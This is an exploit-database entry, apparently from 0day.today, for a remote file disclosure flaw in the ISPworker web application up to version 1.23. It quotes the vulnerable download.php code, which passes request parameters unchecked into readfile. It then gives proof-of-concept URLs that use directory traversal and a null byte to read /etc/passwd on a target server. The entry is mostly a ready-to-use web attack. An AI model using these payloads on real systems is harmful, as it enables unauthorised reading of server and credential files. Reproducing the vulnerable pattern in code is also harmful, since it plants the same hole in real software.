Lucene search

K
zdtCr4wl3r1337DAY-ID-10059
HistoryDec 01, 2009 - 12:00 a.m.

ISPworker <= 1.23 Remote File Disclosure exploit

2009-12-0100:00:00
cr4wl3r
0day.today
8

Exploit for unknown platform in category web applications

================================================
ISPworker <= 1.23 Remote File Disclosure exploit
================================================

########################################################################
 
#ISPworker <= 1.23 Remote File Disclosure exploit
 
#Download Script      :  http://www.ispware.de/_files/ispworker-1.23.tar.gz
 
#Dork                 :  die("lamers attempt");  :P
 
########################################################################
 
#
 
#Vuln : ./ispworker-1.23/files/ispworker/module/ticket/download.php
 
#
 
#       <?header('Content-type: '.$_REQUEST[type]);
 
#        header('Content-Disposition: attachment; filename="'.$_REQUEST[filename].'"');
 
#        readfile("./tmp/$ticketid"."_".$_REQUEST[filename]);
 
#       ?>
 
#
 
#PoC  :  http://[target]/[path]/module/ticket/download.php?ticketid=../../../../../../../../../etc/passwd%00
 
#        http://[target]/[path]/module/ticket/download.php?filename=../../../../../../../../../etc/passwd
 
#
 
########################################################################



#  0day.today [2018-04-09]  #